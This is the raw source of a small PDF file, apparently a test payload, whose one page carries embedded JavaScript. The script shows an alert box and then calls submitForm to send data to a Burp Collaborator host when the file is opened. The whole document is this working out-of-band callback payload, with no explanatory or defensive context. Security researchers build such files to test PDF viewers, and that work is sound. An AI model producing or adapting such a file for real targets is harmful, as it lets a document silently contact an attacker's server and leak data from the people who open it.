%PDF-1.3
%ºß¬à

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
>>
endobj

2 0 obj
<<
  /Type /Pages
  /Kids [3 0 R]
  /Count 1
>>
endobj

3 0 obj
<<
  /Type /Page
  /Parent 2 0 R
  /Resources <<
    /JavaScript << /JS 4 0 R >>
  >>
  /MediaBox [0 0 612 792]
>>
endobj

4 0 obj
<<
  /S /JavaScript
  /JS (
    app.alert(1);
    this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['Abc']);
  )
>>
endobj

xref
0 5
0000000000 65535 f 
0000000015 00000 n 
0000000074 00000 n 
0000000139 00000 n 
0000000280 00000 n 

trailer
<<
  /Size 5
  /Root 1 0 R
>>
startxref
450
%%EOF
